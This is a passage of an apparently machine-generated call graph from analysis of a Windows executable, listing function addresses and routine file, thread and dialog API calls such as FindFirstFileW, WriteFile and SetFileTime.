28923->28926 28925 a2b1d0 28925->28923 28927 a21a66 26 API calls 28926->28927 28928 a2b1f3 28927->28928 28929 a21a66 26 API calls 28928->28929 28930 a2b1fe 28929->28930 29757 a328aa 28930->29757 28932 a2b206 28933 a21a66 26 API calls 28932->28933 28934 a2b20e 28933->28934 28935 a21a66 26 API calls 28934->28935 28936 a2b216 28935->28936 28937 a2d869 26 API calls 28936->28937 28938 a2b21d 28937->28938 28938->28493 28940 a21c03 28939->28940 28942 a21bfb 28939->28942 28940->28942 28943 a21c33 28 API calls 28940->28943 28942->28887 28943->28942 28945 a32821 __EH_prolog3 28944->28945 28946 a456f6 28 API calls 28945->28946 28947 a3285f 28946->28947 28948 a32872 28947->28948 28965 a280ec 28947->28965 28950 a456f6 28 API calls 28948->28950 28951 a32883 28950->28951 28952 a280ec 28 API calls 28951->28952 28953 a32896 28951->28953 28952->28953 28953->28895 28955 a225a4 26 API calls 28954->28955 28956 a2b23f 28955->28956 28957 a225a4 26 API calls 28956->28957 28958 a2b118 28957->28958 28958->28898 28960 a3a5a5 __EH_prolog3 28959->28960 28961 a456f6 28 API calls 28960->28961 28962 a3a5bf 28961->28962 28963 a3a5d6 28962->28963 28984 a37445 112 API calls 28962->28984 28963->28905 28966 a280f8 __EH_prolog3 28965->28966 28971 a45b4b 28966->28971 28968 a28111 28969 a45b4b 28 API calls 28968->28969 28970 a28133 __cftof 28969->28970 28970->28948 28972 a45b57 ___scrt_is_nonwritable_in_current_image 28971->28972 28973 a45b82 28972->28973 28975 a28180 28972->28975 28973->28968 28976 a2818c __EH_prolog3 28975->28976 28979 a34f2b 28976->28979 28978 a28196 28978->28972 28980 a34f37 __EH_prolog3 28979->28980 28983 a21ece 28 API calls 28980->28983 28982 a34f50 28982->28978 28983->28982 28984->28963 28986 a2bc80 28985->28986 29026 a220b0 28986->29026 28988 a2bca7 28989 a2bcba 28988->28989 29250 a2e910 28988->29250 28993 a2bcec 28989->28993 29038 a227e0 28989->29038 28992 a2bce8 28992->28993 29062 a22d41 160 API calls __EH_prolog3_GS 28992->29062 29227 a2232c 28993->29227 28999 a2bd14 29000 a2be08 28999->29000 29001 a27673 28 API calls 28999->29001 29063 a2bec2 7 API calls 29000->29063 29003 a2bd36 29001->29003 29254 a31e54 46 API calls 2 library calls 29003->29254 29005 a2bd53 29007 a2f711 53 API calls 29005->29007 29009 a2bde8 29005->29009 29013 a21a66 26 API calls 29005->29013 29255 a31e54 46 API calls 2 library calls 29005->29255 29006 a2be16 29008 a2be76 29006->29008 29064 a3864f 29006->29064 29007->29005 29008->28993 29067 a252d8 29008->29067 29079 a2bf3d 29008->29079 29012 a21a66 26 API calls 29009->29012 29014 a2bded 29012->29014 29013->29005 29017 a21a66 26 API calls 29014->29017 29017->29000 29019 a31a9f 5 API calls 29018->29019 29020 a2f723 29019->29020 29021 a2f74b 29020->29021 29701 a2f826 29020->29701 29021->28909 29024 a2f738 FindClose 29024->29021 29025->28914 29027 a220bc __EH_prolog3 29026->29027 29028 a280ec 28 API calls 29027->29028 29029 a220d9 29028->29029 29030 a32815 28 API calls 29029->29030 29031 a220e8 29030->29031 29032 a22193 29031->29032 29033 a456f6 28 API calls 29031->29033 29264 a3026f 29032->29264 29034 a22180 29033->29034 29034->29032 29256 a276e7 29034->29256 29037 a22227 __cftof 29037->28988 29039 a227ec __EH_prolog3 29038->29039 29040 a211dd 28 API calls 29039->29040 29044 a22838 29039->29044 29059 a2298b 29039->29059 29045 a22882 29040->29045 29041 a229a9 29288 a2204b 89 API calls __ehhandler$___std_fs_get_file_id@8 29041->29288 29043 a252d8 133 API calls 29049 a229f4 29043->29049 29044->29041 29046 a229b6 29044->29046 29060 a2e850 111 API calls 29045->29060 29046->29043 29046->29059 29047 a22a3c 29051 a22a6f 29047->29051 29047->29059 29289 a2204b 89 API calls __ehhandler$___std_fs_get_file_id@8 29047->29289 29049->29047 29050 a252d8 133 API calls 29049->29050 29050->29049 29051->29059 29061 a2e850 111 API calls 29051->29061 29052 a22986 29055 a22e8b 26 API calls 29052->29055 29053 a22995 29054 a22e8b 26 API calls 29053->29054 29054->29044 29055->29059 29056 a228ad 29056->29052 29056->29053 29057 a252d8 133 API calls 29058 a22ac0 29057->29058 29058->29057 29058->29059 29059->28992 29060->29056 29061->29058 29062->28999 29063->29006 29290 a44300 29064->29290 29068 a252e4 29067->29068 29069 a252e8 29067->29069 29068->29008 29078 a2e850 111 API calls 29069->29078 29070 a252fa 29071 a25323 29070->29071 29072 a25315 29070->29072 29321 a23d9d 131 API calls 3 library calls 29071->29321 29073 a25355 29072->29073 29320 a248aa 118 API calls 2 library calls 29072->29320 29073->29008 29076 a25321 29076->29073 29322 a2344b 89 API calls 29076->29322 29078->29070 29080 a2bf95 29079->29080 29085 a2bfc4 29080->29085 29145 a2c2fd 29080->29145 29422 a3cdb4 135 API calls __EH_prolog3_GS 29080->29422 29082 a2d2e5 29083 a2d331 29082->29083 29084 a2d2ea 29082->29084 29083->29145 29494 a3cdb4 135 API calls __EH_prolog3_GS 29083->29494 29084->29145 29493 a2ab88 185 API calls 29084->29493 29085->29082 29090 a2bfeb 29085->29090 29085->29145 29086 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 29087 a2d327 29086->29087 29087->29008 29090->29145 29323 a27e1b 29090->29323 29092 a2c0c8 29335 a3106b 29092->29335 29096 a2c151 29100 a2c16f 29096->29100 29424 a32095 45 API calls __EH_prolog3_GS 29096->29424 29098 a2c269 29104 a2c29b 29098->29104 29425 a219a9 26 API calls 29098->29425 29099 a2d205 29103 a2c948 29099->29103 29140 a2c743 29099->29140 29127 a2c239 29100->29127 29427 a30ddb 28 API calls 29100->29427 29102 a2c374 29102->29099 29105 a2c3ea 29102->29105 29106 a2c3cf 29102->29106 29118 a2c97a 29103->29118 29460 a219a9 26 API calls 29103->29460 29104->29145 29426 a219a9 26 API calls 29104->29426 29121 a2c409 29105->29121 29429 a2b92d 56 API calls __ehhandler$___std_fs_get_file_id@8 29105->29429 29108 a21a66 26 API calls 29106->29108 29111 a2c3da 29108->29111 29117 a21a66 26 API calls 29111->29117 29113 a2d276 29113->29145 29492 a219a9 26 API calls 29113->29492 29117->29145 29118->29145 29461 a219a9 26 API calls 29118->29461 29119 a2c33d _wcslen 29428 a2f103 52 API calls 2 library calls 29119->29428 29120 a2c4ea 29345 a2b2ee 29120->29345 29121->29120 29123 a2f711 53 API calls 29121->29123 29133 a2c49b 29123->29133 29126 a2c5c2 29128 a2c7d8 29126->29128 29132 a2c5cf 29126->29132 29127->29098 29127->29102 29438 a32a36 115 API calls 29128->29438 29129 a21a66 26 API calls 29129->29120 29166 a2c62c 29132->29166 29432 a257c0 28 API calls 2 library calls 29132->29432 29133->29129 29136 a2c501 29142 a2c551 29136->29142 29430 a219a9 26 API calls 29136->29430 29138 a2c8f0 29146 a2c9eb 29138->29146 29162 a2c8ff 29138->29162 29139 a2c830 29139->29138 29147 a2c859 29139->29147 29140->29113 29491 a219a9 26 API calls 29140->29491 29142->29145 29431 a219a9 26 API calls 29142->29431 29145->29086 29158 a2c874 29146->29158 29351 a2b345 29146->29351 29151 a2ed0d 49 API calls 29147->29151 29153 a2ca64 29147->29153 29147->29158 29148 a2c940 29150 a2ddc7 114 API calls 29148->29150 29150->29103 29155 a2c8b3 29151->29155 29152 a2ca01 29156 a2ca05 29152->29156 29357 a2b778 29152->29357 29178 a2cac5 29153->29178 29218 a2d1f2 29153->29218 29462 a2e152 29153->29462 29154 a2ddc7 114 API calls 29154->29099 29155->29158 29440 a2d8b8 29155->29440 29159 a2ddc7 114 API calls 29156->29159 29158->29153 29158->29156 29169 a2b345 90 API calls 29158->29169 29159->29140 29162->29148 29459 a2b544 144 API calls __EH_prolog3_GS 29162->29459 29165 a2cb15 29171 a2fd70 28 API calls 29165->29171 29166->29140 29167 a2c77a 29166->29167 29174 a2c781 29166->29174 29433 a2b015 28 API calls 29166->29433 29434 a32a36 115 API calls 29166->29434 29435 a232d2 89 API calls __ehhandler$___std_fs_get_file_id@8 29166->29435 29436 a2b8ed 89 API calls 29166->29436 29437 a232d2 89 API calls __ehhandler$___std_fs_get_file_id@8 29167->29437 29173 a2ca5e 29169->29173 29183 a2cb2f 29171->29183 29173->29153 29173->29156 29174->29139 29439 a2ede9 119 API calls __ehhandler$___std_fs_get_file_id@8 29174->29439 29176 a2cab7 29466 a29653 109 API calls 29176->29466 29387 a2fd70 29178->29387 29179 a2cc21 29180 a2cc76 29179->29180 29181 a2cf27 29179->29181 29182 a2cd33 29180->29182 29185 a2cc94 29180->29185 29186 a2cf50 29181->29186 29187 a2cf39 29181->29187 29201 a2ccb5 29181->29201 29470 a322b9 28 API calls 29182->29470 29183->29179 29467 a2e39d 8 API calls 29183->29467 29189 a2ccd8 29185->29189 29200 a2cca3 29185->29200 29391 a39625 29186->29391 29477 a2d771 29187->29477 29188 a2cd69 29193 a3106b 45 API calls 29188->29193 29189->29201 29469 a2a7a2 142 API calls 29189->29469 29192 a2cf73 29409 a394ea 29192->29409 29198 a2cd76 29193->29198 29194 a2cf15 29215 a2d044 29194->29215 29488 a232d2 89 API calls __ehhandler$___std_fs_get_file_id@8 29194->29488 29471 a2b92d 56 API calls __ehhandler$___std_fs_get_file_id@8 29198->29471 29468 a232d2 89 API calls __ehhandler$___std_fs_get_file_id@8 29200->29468 29201->29194 29476 a2fd28 5 API calls __ehhandler$___std_fs_get_file_id@8 29201->29476 29204 a2cdaf 29205 a2cddf 29204->29205 29206 a2cdcd 29204->29206 29212 a2cddd 29204->29212 29473 a2d3d7 135 API calls __ehhandler$___std_fs_get_file_id@8 29205->29473 29472 a2a496 119 API calls 29206->29472 29207 a2ce3e 29207->29201 29475 a219a9 26 API calls 29207->29475 29212->29207 29474 a219a9 26 API calls 29212->29474 29214 a2d115 29417 a2e772 29214->29417 29215->29214 29215->29218 29220 a2d161 29215->29220 29416 a2e8d9 SetEndOfFile 29215->29416 29218->29154 29219 a2d159 29221 a2de50 110 API calls 29219->29221 29220->29218 29222 a2f58b 49 API calls 29220->29222 29221->29220 29223 a2d1d2 29222->29223 29223->29218 29489 a232d2 89 API calls __ehhandler$___std_fs_get_file_id@8 29223->29489 29225 a2d1e8 29490 a29500 109 API calls __EH_prolog3_GS 29225->29490 29228 a2233e 29227->29228 29233 a22350 29227->29233 29228->29233 29697 a223b0 26 API calls 29228->29697 29229 a21a66 26 API calls 29230 a22369 29229->29230 29698 a22ed0 26 API calls 29230->29698 29233->29229 29234 a22374 29699 a224d9 26 API calls 29234->29699 29251 a2e927 29250->29251 29252 a2e931 29251->29252 29700 a293d7 110 API calls __EH_prolog3_GS 29251->29700 29252->28989 29254->29005 29255->29005 29257 a276f3 __EH_prolog3 29256->29257 29272 a30aaf 29257->29272 29259 a276fd 29260 a34f2b 28 API calls 29259->29260 29261 a27874 29260->29261 29275 a27cba GetCurrentProcess GetProcessAffinityMask 29261->29275 29263 a27891 29263->29032 29265 a3028f __cftof 29264->29265 29285 a30152 29265->29285 29268 a21a66 26 API calls 29269 a302b4 29268->29269 29270 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 29269->29270 29271 a302bf 29270->29271 29271->29037 29276 a30b05 29272->29276 29275->29263 29277 a30b17 __cftof 29276->29277 29280 a376e5 29277->29280 29283 a376a7 GetCurrentProcess GetProcessAffinityMask 29280->29283 29284 a30b01 29283->29284 29284->29259 29286 a225a4 26 API calls 29285->29286 29287 a301c7 29286->29287 29287->29268 29288->29059 29289->29051 29291 a4430c __EH_prolog3_GS 29290->29291 29306 a32117 29291->29306 29294 a34318 53 API calls 29295 a44342 29294->29295 29296 a36a25 53 API calls 29295->29296 29297 a4434c 29296->29297 29298 a21a66 26 API calls 29297->29298 29299 a4435b 29298->29299 29310 a43ec5 29299->29310 29302 a21a66 26 API calls 29303 a44375 29302->29303 29304 a45787 5 API calls 29303->29304 29305 a38665 29304->29305 29305->29008 29307 a32124 29306->29307 29308 a2769f 45 API calls 29307->29308 29309 a32136 29308->29309 29309->29294 29311 a43ed1 __EH_prolog3_GS 29310->29311 29312 a214a7 28 API calls 29311->29312 29313 a43edd 29312->29313 29314 a43572 21 API calls 29313->29314 29315 a43eec 29314->29315 29316 a21a66 26 API calls 29315->29316 29317 a43ef4 29316->29317 29318 a45787 5 API calls 29317->29318 29319 a43ef9 29318->29319 29319->29302 29320->29076 29321->29076 29322->29073 29324 a27e27 __EH_prolog3_GS 29323->29324 29495 a27bfc 29324->29495 29326 a45787 5 API calls 29328 a27ecf 29326->29328 29327 a27e68 29331 a27e6c 29327->29331 29332 a27ed2 29327->29332 29333 a27ebe 29327->29333 29500 a27bd6 30 API calls 29327->29500 29328->29092 29330 a21a66 26 API calls 29330->29331 29331->29326 29332->29333 29501 a2adaa CompareStringW 29332->29501 29333->29330 29344 a31095 29335->29344 29336 a31256 29337 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 29336->29337 29339 a2c11b 29337->29339 29338 a2769f 45 API calls 29340 a31241 29338->29340 29339->29100 29423 a32095 45 API calls __EH_prolog3_GS 29339->29423 29341 a225a4 26 API calls 29340->29341 29342 a3124d 29341->29342 29343 a21a66 26 API calls 29342->29343 29343->29336 29344->29336 29344->29338 29346 a2b303 29345->29346 29347 a2b33b 29346->29347 29544 a29635 89 API calls 29346->29544 29347->29126 29347->29136 29349 a2b333 29545 a2204b 89 API calls __ehhandler$___std_fs_get_file_id@8 29349->29545 29352 a2b368 29351->29352 29356 a2b39e 29351->29356 29352->29356 29546 a385fd 75 API calls 29352->29546 29354 a2b39a 29354->29356 29547 a232a1 89 API calls __ehhandler$___std_fs_get_file_id@8 29354->29547 29356->29152 29359 a2b784 __EH_prolog3_GS 29357->29359 29358 a2b8e3 29361 a45787 5 API calls 29358->29361 29359->29358 29360 a2d8b8 138 API calls 29359->29360 29362 a2b7ef 29360->29362 29363 a2b8ea 29361->29363 29362->29358 29548 a29283 109 API calls 29362->29548 29363->29158 29365 a2b817 29366 a2ed0d 49 API calls 29365->29366 29367 a2b81d 29366->29367 29368 a2b838 29367->29368 29549 a2ed1f 29367->29549 29562 a31a27 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 29368->29562 29371 a2b83e 29371->29358 29563 a2204b 89 API calls __ehhandler$___std_fs_get_file_id@8 29371->29563 29373 a2b850 29376 a27673 28 API calls 29373->29376 29374 a2b827 29374->29368 29561 a232a1 89 API calls __ehhandler$___std_fs_get_file_id@8 29374->29561 29377 a2b859 29376->29377 29378 a2b88d 29377->29378 29564 a2ede9 119 API calls __ehhandler$___std_fs_get_file_id@8 29377->29564 29379 a2eaf3 54 API calls 29378->29379 29384 a2b8c9 29378->29384 29380 a2b8a1 29379->29380 29382 a2d8b8 138 API calls 29380->29382 29383 a2b8c5 29382->29383 29383->29384 29565 a29283 109 API calls 29383->29565 29385 a21a66 26 API calls 29384->29385 29385->29358 29388 a2fd7e 29387->29388 29390 a2fd88 29387->29390 29389 a456f6 28 API calls 29388->29389 29389->29390 29390->29165 29392 a39639 29391->29392 29393 a3975f 29392->29393 29395 a39644 29392->29395 29394 a4734a _com_raise_error RaiseException 29393->29394 29396 a3970b 29394->29396 29395->29396 29397 a4d08c ___std_exception_copy 21 API calls 29395->29397 29399 a396ed 29395->29399 29401 a39739 29395->29401 29398 a4734a _com_raise_error RaiseException 29396->29398 29397->29399 29404 a397a3 __EH_prolog3 __cftof 29398->29404 29399->29396 29400 a3971f 29399->29400 29399->29401 29400->29401 29567 a39556 89 API calls 4 library calls 29400->29567 29401->29192 29403 a39896 29403->29192 29404->29403 29405 a45b4b 28 API calls 29404->29405 29407 a3982d __cftof 29404->29407 29405->29407 29406 a4d08c ___std_exception_copy 21 API calls 29406->29407 29407->29403 29407->29406 29568 a29384 89 API calls 29407->29568 29410 a394f3 29409->29410 29411 a3951f 29410->29411 29412 a39515 29410->29412 29415 a3951d 29410->29415 29584 a3abc8 155 API calls 29411->29584 29569 a3b76f 29412->29569 29415->29201 29416->29214 29418 a2e792 29417->29418 29419 a2e783 29417->29419 29421 a2e80f SetFileTime 29418->29421 29419->29418 29420 a2e789 FlushFileBuffers 29419->29420 29420->29418 29421->29219 29422->29085 29423->29096 29424->29100 29425->29104 29426->29145 29427->29119 29428->29127 29429->29121 29430->29142 29431->29145 29432->29166 29433->29166 29434->29166 29435->29166 29436->29166 29437->29174 29438->29174 29439->29139 29441 a2d8c5 29440->29441 29442 a2ed0d 49 API calls 29441->29442 29451 a2d8d7 29442->29451 29443 a2d93e 29444 a2d953 29443->29444 29449 a2de9a 49 API calls 29443->29449 29448 a2eaf3 54 API calls 29444->29448 29454 a2d957 29444->29454 29445 a2d8e8 29445->29451 29665 a2d990 125 API calls __EH_prolog3_GS 29445->29665 29450 a2d973 29448->29450 29449->29444 29452 a2d982 29450->29452 29453 a2d977 29450->29453 29451->29443 29451->29445 29451->29454 29456 a2ed0d 49 API calls 29451->29456 29666 a3846c 61 API calls __ehhandler$___std_fs_get_file_id@8 29451->29666 29667 a292e6 RaiseException _com_raise_error 29451->29667 29457 a2ec63 49 API calls 29452->29457 29455 a2de9a 49 API calls 29453->29455 29454->29158 29455->29454 29456->29451 29457->29454 29459->29148 29460->29118 29461->29145 29463 a2e15b GetFileType 29462->29463 29464 a2caa5 29462->29464 29463->29464 29464->29178 29465 a232d2 89 API calls __ehhandler$___std_fs_get_file_id@8 29464->29465 29465->29176 29466->29178 29467->29179 29468->29201 29469->29201 29470->29188 29471->29204 29472->29212 29473->29212 29474->29207 29475->29201 29476->29194 29478 a2d77d __EH_prolog3 29477->29478 29479 a211dd 28 API calls 29478->29479 29480 a2d788 29479->29480 29481 a32af9 150 API calls 29480->29481 29487 a2d7b1 29481->29487 29482 a2d804 29484 a2d828 29482->29484 29676 a219a9 26 API calls 29482->29676 29484->29201 29486 a32af9 150 API calls 29486->29487 29487->29482 29487->29486 29668 a32ce5 29487->29668 29488->29215 29489->29225 29490->29218 29491->29113 29492->29145 29493->29145 29494->29145 29502 a2790e 29495->29502 29497 a27c1d 29497->29327 29499 a2790e 47 API calls 29499->29497 29500->29327 29501->29333 29503 a3106b 45 API calls 29502->29503 29520 a27989 _wcslen 29503->29520 29504 a27b4a 29506 a27b92 29504->29506 29534 a219a9 26 API calls 29504->29534 29507 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 29506->29507 29509 a27bbb 29507->29509 29509->29497 29509->29499 29510 a32117 45 API calls 29510->29520 29511 a27673 28 API calls 29511->29520 29513 a3106b 45 API calls 29513->29520 29514 a2769f 45 API calls 29514->29520 29516 a27bc2 29517 a21a66 26 API calls 29516->29517 29519 a27bc7 29517->29519 29518 a21a66 26 API calls 29518->29520 29521 a21a66 26 API calls 29519->29521 29520->29510 29520->29511 29520->29513 29520->29514 29520->29516 29520->29518 29522 a27b1b 29520->29522 29524 a31a9f 29520->29524 29528 a21b63 29520->29528 29532 a27bd6 30 API calls 29520->29532 29521->29522 29522->29504 29533 a219a9 26 API calls 29522->29533 29525 a31ab1 29524->29525 29535 a296e5 29525->29535 29529 a21b8e 29528->29529 29530 a21b6f 29528->29530 29543 a213f7 28 API calls 29529->29543 29530->29520 29532->29520 29533->29504 29534->29506 29536 a296f1 _wcslen 29535->29536 29539 a290f4 29536->29539 29540 a29137 __cftof 29539->29540 29541 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 29540->29541 29542 a291a9 29541->29542 29542->29520 29543->29530 29544->29349 29545->29347 29546->29354 29547->29356 29548->29365 29550 a2ed2b __EH_prolog3_GS 29549->29550 29551 a2ed38 GetFileAttributesW 29550->29551 29552 a2ed46 29551->29552 29559 a2edad 29551->29559 29554 a3169a 47 API calls 29552->29554 29553 a45787 5 API calls 29556 a2edc3 29553->29556 29555 a2ed68 29554->29555 29557 a2ed81 29555->29557 29558 a2ed78 GetFileAttributesW 29555->29558 29556->29374 29557->29559 29566 a219a9 26 API calls 29557->29566 29558->29557 29559->29553 29561->29368 29562->29371 29563->29373 29564->29378 29565->29384 29566->29559 29567->29401 29568->29407 29585 a397a4 29569->29585 29572 a3bb9c 29617 a3a814 129 API calls __InternalCxxFrameHandler 29572->29617 29574 a3bbb5 __InternalCxxFrameHandler 29575 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 29574->29575 29577 a3bbfc 29575->29577 29576 a3b78e __InternalCxxFrameHandler 29576->29572 29592 a32af9 29576->29592 29603 a37590 29576->29603 29609 a3a008 150 API calls 29576->29609 29610 a3bc05 150 API calls 29576->29610 29611 a377cf 29576->29611 29615 a39a2b 129 API calls 29576->29615 29616 a3c27f 155 API calls 29576->29616 29577->29415 29584->29415 29587 a397b0 __EH_prolog3 __cftof 29585->29587 29586 a39896 29586->29576 29587->29586 29588 a45b4b 28 API calls 29587->29588 29590 a3982d __cftof 29587->29590 29588->29590 29589 a4d08c ___std_exception_copy 21 API calls 29589->29590 29590->29586 29590->29589 29618 a29384 89 API calls 29590->29618 29600 a32b0f __InternalCxxFrameHandler 29592->29600 29593 a32c7f 29594 a32cb3 29593->29594 29619 a32ab0 29593->29619 29596 a32cd4 29594->29596 29625 a282a0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 29594->29625 29626 a373f8 29596->29626 29600->29593 29601 a32c76 29600->29601 29623 a2fe6f 123 API calls __EH_prolog3 29600->29623 29624 a3cdb4 135 API calls __EH_prolog3_GS 29600->29624 29601->29576 29604 a375a1 29603->29604 29605 a3759c 29603->29605 29607 a375b1 29604->29607 29608 a377cf 113 API calls 29604->29608 29642 a37628 29605->29642 29607->29576 29608->29607 29609->29576 29610->29576 29612 a37806 29611->29612 29613 a377db ResetEvent ReleaseSemaphore 29611->29613 29612->29576 29657 a375ed WaitForSingleObject 29613->29657 29615->29576 29616->29576 29617->29574 29618->29590 29620 a32af5 29619->29620 29621 a32ab8 29619->29621 29620->29594 29621->29620 29632 a38618 29621->29632 29623->29600 29624->29600 29625->29596 29627 a373ff 29626->29627 29628 a3741a 29627->29628 29640 a292e6 RaiseException _com_raise_error 29627->29640 29630 a3742b SetThreadExecutionState 29628->29630 29641 a292e6 RaiseException _com_raise_error 29628->29641 29630->29601 29635 a44231 29632->29635 29636 a360d5 29635->29636 29637 a44248 SendDlgItemMessageW 29636->29637 29638 a40678 PeekMessageW GetMessageW IsDialogMessageW TranslateMessage DispatchMessageW 29637->29638 29639 a38638 29638->29639 29639->29620 29640->29628 29641->29630 29643 a376a1 29642->29643 29647 a37633 29642->29647 29643->29604 29644 a37638 CreateThread 29644->29647 29653 a37760 29644->29653 29646 a37690 SetThreadPriority 29646->29647 29647->29643 29647->29644 29647->29646 29650 a292eb 109 API calls __EH_prolog3_GS 29647->29650 29651 a29500 109 API calls __EH_prolog3_GS 29647->29651 29652 a292e6 RaiseException _com_raise_error 29647->29652 29650->29647 29651->29647 29652->29647 29656 a3776e 116 API calls 29653->29656 29655 a37769 29656->29655 29658 a375fe GetLastError 29657->29658 29662 a37624 29657->29662 29663 a292eb 109 API calls __EH_prolog3_GS 29658->29663 29660 a37618 29664 a292e6 RaiseException _com_raise_error 29660->29664 29662->29612 29663->29660 29664->29662 29665->29445 29666->29451 29667->29451 29669 a32d18 29668->29669 29672 a32cfe __InternalCxxFrameHandler 29668->29672 29669->29672 29677 a2e948 29669->29677 29671 a32d42 29674 a373f8 2 API calls 29671->29674 29672->29671 29694 a2fe6f 123 API calls __EH_prolog3 29672->29694 29675 a32d47 29674->29675 29675->29487 29676->29484 29678 a2e954 __EH_prolog3_GS 29677->29678 29679 a2e963 29678->29679 29680 a2e976 GetStdHandle 29678->29680 29692 a2e988 29678->29692 29681 a45787 5 API calls 29679->29681 29680->29692 29682 a2eaab 29681->29682 29682->29672 29683 a2e9df WriteFile 29683->29692 29684 a2e9af WriteFile 29685 a2e9ad 29684->29685 29684->29692 29685->29684 29685->29692 29687 a2ea77 29688 a214a7 28 API calls 29687->29688 29689 a2ea84 29688->29689 29696 a29653 109 API calls 29689->29696 29691 a2ea97 29693 a21a66 26 API calls 29691->29693 29692->29679 29692->29683 29692->29684 29692->29685 29692->29687 29695 a29230 111 API calls 29692->29695 29693->29679 29694->29671 29695->29692 29696->29691 29698->29234 29700->29252 29702 a2f835 __EH_prolog3_GS 29701->29702 29703 a2f847 FindFirstFileW 29702->29703 29704 a2f925 FindNextFileW 29702->29704 29707 a2f948 29703->29707 29708 a2f86a 29703->29708 29706 a2f937 GetLastError 29704->29706 29704->29707 29724 a2f90d 29706->29724 29712 a214a7 28 API calls 29707->29712 29709 a3169a 47 API calls 29708->29709 29710 a2f88c 29709->29710 29713 a2f8ac 29710->29713 29716 a2f899 29710->29716 29717 a2f89c FindFirstFileW 29710->29717 29711 a45787 5 API calls 29714 a2f733 29711->29714 29715 a2f95f 29712->29715 29723 a2f8e8 29713->29723 29725 a219a9 26 API calls 29713->29725 29714->29021 29714->29024 29726 a3229d 29715->29726 29716->29717 29717->29713 29720 a2f902 GetLastError 29720->29724 29721 a21a66 26 API calls 29721->29724 29723->29707 29723->29720 29724->29711 29725->29723 29727 a322a6 29726->29727 29730 a3236c 29727->29730 29731 a32378 29730->29731 29734 a3238e 29731->29734 29733 a2f970 29733->29721 29735 a324e5 29734->29735 29738 a323a4 29734->29738 29742 a258cb 45 API calls 29735->29742 29740 a323bc 29738->29740 29741 a30c7f 28 API calls 29738->29741 29740->29733 29741->29740 29744 a2d6e5 29743->29744 29748 a2d70b 29743->29748 29747 a2ec63 49 API calls 29744->29747 29744->29748 29747->29744 29779 a2d89e 29748->29779 29749 a2b231 26 API calls 29750 a2d74c 29749->29750 29751 a21a66 26 API calls 29750->29751 29752 a2d755 29751->29752 29753 a21a66 26 API calls 29752->29753 29754 a2d75e 29753->29754 29755 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 29754->29755 29756 a2b1bf 29755->29756 29756->28925 29763 a3909b 29756->29763 29758 a328bb 29757->29758 29784 a2fb8e 29758->29784 29760 a328ed 29761 a2fb8e 118 API calls 29760->29761 29762 a328f8 29761->29762 29764 a390aa 29763->29764 29765 a374ec 118 API calls 29764->29765 29766 a390b9 29764->29766 29765->29766 29795 a34264 26 API calls 29766->29795 29768 a390e8 29796 a34264 26 API calls 29768->29796 29770 a390f3 29797 a34264 26 API calls 29770->29797 29772 a390fe 29798 a34288 26 API calls 29772->29798 29774 a39132 29775 a22e8b 26 API calls 29774->29775 29776 a3913a 29775->29776 29777 a22e8b 26 API calls 29776->29777 29778 a39142 29777->29778 29780 a2d714 29779->29780 29781 a2d8a8 29779->29781 29780->29749 29783 a2ae77 26 API calls 29781->29783 29783->29780 29785 a2fbbb 29784->29785 29787 a2fbc2 29784->29787 29788 a374ec 29785->29788 29787->29760 29789 a377cf 113 API calls 29788->29789 29790 a37518 ReleaseSemaphore 29789->29790 29791 a37556 DeleteCriticalSection CloseHandle CloseHandle 29790->29791 29792 a37538 29790->29792 29791->29787 29793 a375ed 111 API calls 29792->29793 29794 a37542 CloseHandle 29793->29794 29794->29791 29794->29792 29795->29768 29796->29770 29797->29772 29798->29774 29808 a3eac4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 29799->29808 29801 a3eaad 29802 a3eab9 29801->29802 29809 a3eae5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 29801->29809 29802->28498 29802->28499 29804->28500 29805->28510 29806->28510 29807->28513 29808->29801 29809->29802 29810->28516 29811->28519 29812->28530 29814 a2e910 110 API calls 29813->29814 29815 a22dc7 29814->29815 29816 a227e0 133 API calls 29815->29816 29819 a22de4 29815->29819 29817 a22dd4 29816->29817 29817->29819 29824 a2204b 89 API calls __ehhandler$___std_fs_get_file_id@8 29817->29824 29819->28540 29819->28541 29821 a22797 29820->29821 29822 a2279b 29820->29822 29821->28546 29825 a226d2 29822->29825 29824->29819 29826 a226e4 29825->29826 29827 a22721 29825->29827 29828 a252d8 133 API calls 29826->29828 29833 a25767 29827->29833 29829 a22704 29828->29829 29829->29821 29836 a25770 29833->29836 29834 a252d8 133 API calls 29834->29836 29835 a373f8 2 API calls 29835->29836 29836->29834 29836->29835 29837 a22742 29836->29837 29837->29829 29838 a22c30 29837->29838 29839 a22c3c __EH_prolog3_GS 29838->29839 29860 a25365 29839->29860 29841 a22c8f 29844 a22d02 29841->29844 29896 a219a9 26 API calls 29841->29896 29842 a45787 5 API calls 29845 a22d18 29842->29845 29843 a22c5a 29843->29841 29846 a22c91 29843->29846 29847 a22c86 29843->29847 29844->29842 29845->29829 29850 a22c9a 29846->29850 29851 a22cb9 29846->29851 29892 a3888c 28 API calls 29847->29892 29893 a3880e 28 API calls __EH_prolog3 29850->29893 29894 a38707 29 API calls 2 library calls 29851->29894 29853 a22ca7 29854 a225a4 26 API calls 29853->29854 29856 a22caf 29854->29856 29858 a21a66 26 API calls 29856->29858 29857 a22cd2 29895 a22ed0 26 API calls 29857->29895 29858->29841 29861 a25380 29860->29861 29862 a253ca 29861->29862 29863 a253ae 29861->29863 29864 a25634 29862->29864 29868 a253f6 29862->29868 29897 a2204b 89 API calls __ehhandler$___std_fs_get_file_id@8 29863->29897 29903 a2204b 89 API calls __ehhandler$___std_fs_get_file_id@8 29864->29903 29867 a253b9 29869 a45734 __ehhandler$___std_fs_get_file_id@8 5 API calls 29867->29869 29868->29867 29871 a39625 89 API calls 29868->29871 29870 a25659 29869->29870 29870->29843 29877 a25449 29871->29877 29872 a2547b 29873 a2550d 29872->29873 29891 a25472 29872->29891 29900 a32a36 115 API calls 29872->29900 29875 a2fd70 28 API calls 29873->29875 29874 a25477 29874->29872 29899 a2315d 28 API calls 29874->29899 29882 a25520 29875->29882 29876 a25467 29898 